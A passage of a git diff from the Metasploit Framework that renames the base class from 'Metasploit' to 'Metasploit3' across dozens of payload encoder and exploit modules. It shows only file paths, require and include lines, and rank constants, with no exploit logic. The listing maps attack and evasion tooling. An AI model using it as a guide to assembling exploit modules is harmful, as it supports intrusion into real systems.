--- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # Below normal ranking because this will produce incorrect code a lot of # the time. diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index 467a606ac2..0236e0191e 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = NormalRanking diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index 9461059fe3..e30a7a359a 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = ExcellentRanking def initialize diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index d323e48a4e..c713d4379a 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index a62b7f4baf..7db8116178 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # Set to ManualRanking because actually using ths encoder will # certainly destroy any possibility of a successful shell. diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 46ef9a6a11..6703a746d8 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder def initialize super( diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index f5b1ee6521..dbe78d536b 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index 11a8d75a31..a0fe137c57 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index f19d8021b7..7492549ead 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 0ba2bf55b0..2e1eff8ab9 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 0cd2c36793..05327a5233 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = GreatRanking def initialize diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index 62c4e22dcb..1621e2a3e8 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 0bbac93484..b0e6a90bd2 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 6225520ba1..34995ec80e 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 436ea2ea74..73586cccc7 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/add_sub.rb b/modules/encoders/x86/add_sub.rb index ae4f37db10..93c6c7a014 100644 --- a/modules/encoders/x86/add_sub.rb +++ b/modules/encoders/x86/add_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index dd5a18df0e..2376e6dd61 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' -class Metasploit < Msf::Encoder::Alphanum +class Metasploit3 < Msf::Encoder::Alphanum Rank = LowRanking def initialize diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 9b195ba677..0430d6f403 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_upper' -class Metasploit < Msf::Encoder::Alphanum +class Metasploit3 < Msf::Encoder::Alphanum Rank = LowRanking diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index d8d13ac1fc..44180f5a9e 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 0558d36fcf..238e87b60e 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -88,7 +88,7 @@ require 'msf/core' # 0000004A 3401 xor al,0x1 # 0000004C 7F db 0x7F # -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index 149c3ffd22..c49f4572a9 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index 2360890069..b354574539 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the cpuid value is generated and supplied # manually... diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index d485c6119d..4de58d3824 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the stat(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index 7a058aac66..f5db335623 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the time(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index c7cd4acf26..78faa90631 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index b2490ad61e..f942c29eb9 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::Xor +class Metasploit3 < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 57ee0678db..5a0b98d082 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # Uncomment when we get the poly stuff working again. #Rank = GreatRanking diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index de022e3064..b4e275351e 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonalpha' -class Metasploit < Msf::Encoder::NonAlpha +class Metasploit3 < Msf::Encoder::NonAlpha Rank = LowRanking diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index d42f9d9f05..48a261b1f7 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonupper' -class Metasploit < Msf::Encoder::NonUpper +class Metasploit3 < Msf::Encoder::NonUpper Rank = LowRanking diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index 66219a9c74..a28dbc3702 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 10a1002481..14487f60bc 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -8,7 +8,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit < Msf::Encoder::XorAdditiveFeedback +class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # The shikata encoder has an excellent ranking because it is polymorphic. # Party time, excellent! diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index ab6913d790..e4bb69f6d1 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -12,7 +12,7 @@ require 'msf/core' # The decoder has been tested with all possible values, but the decoder stub # is was not designed to bypass restrictions other than "bit 5 must be on".. # -class Metasploit < Msf::Encoder +class Metasploit3 < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, specifically diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 88a51e5d0d..255f7f21d4 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_mixed' -class Metasploit < Msf::Encoder::Alphanum +class Metasploit3 < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 90cc620f90..821d6f5c92 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_upper' -class Metasploit < Msf::Encoder::Alphanum +class Metasploit3 < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index a746b3c717..ad11665a90 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 187842ba33..3e8a17e173 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index 1b297fffe2..d1d13e601c 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/adb' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb index cdf695b1d2..5b3c906329 100644 --- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb +++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'digest/md5' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 39d0b241cc..5da4b1aabc 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/android' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 840e38c742..1ac2e4a2b6 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/fileformat' require 'msf/core/exploit/pdf' require 'msf/core/exploit/android' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 180d3bb99f..1217a5735b 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index d019248c21..99882d452c 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index ecf7a2e527..2b6fdc0353 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 05b3c5f3d2..6fe5362b96 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index e065e51e1b..c4d398710d 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup diff --git a/modules/exploits/firefox/local/exec_shellcode.rb b/modules/exploits/firefox/local/exec_shellcode.rb index 0926c77b21..043290fb83 100644 --- a/modules/exploits/firefox/local/exec_shellcode.rb +++ b/modules/exploits/firefox/local/exec_shellcode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 410e7bd2d2..d7382725c1 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 3c62a69877..b204008a4a 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index fa3e84cfc5..56bb341327 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 1ae505f355..c2b302d0a0 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index ee280c6e5b..033eee1c4e 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 7eb1bac297..0a2b902014 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 926a3de255..b80a21d738 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index 2609de0621..ed93ca2559 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 2d913961be..5e2674723a 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 4ea9b47e01..b5c8c3d0e8 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 7b478db3f6..5891da9e62 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index dc6db48c8c..569747d8a1 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 7fa54b49da..6640a05340 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index bf4a577861..a64e532d2a 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 9540fa09f9..e3a9832d88 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Only interactive single commands supported include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 3f9bdf7cad..0805c4f7c4 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index be5617cb73..e08ec2ccf0 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Configuration is overwritten and service reloaded include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 6b56f2b41b..7ead5ddb5a 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 0c83c55c17..3ed353e001 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index ba4ea02a6a..0b43b461ad 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /DD-WRT/ ] } diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index f80d659be9..d0fe19aec3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index 2058569b81..accdee0cdb 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ 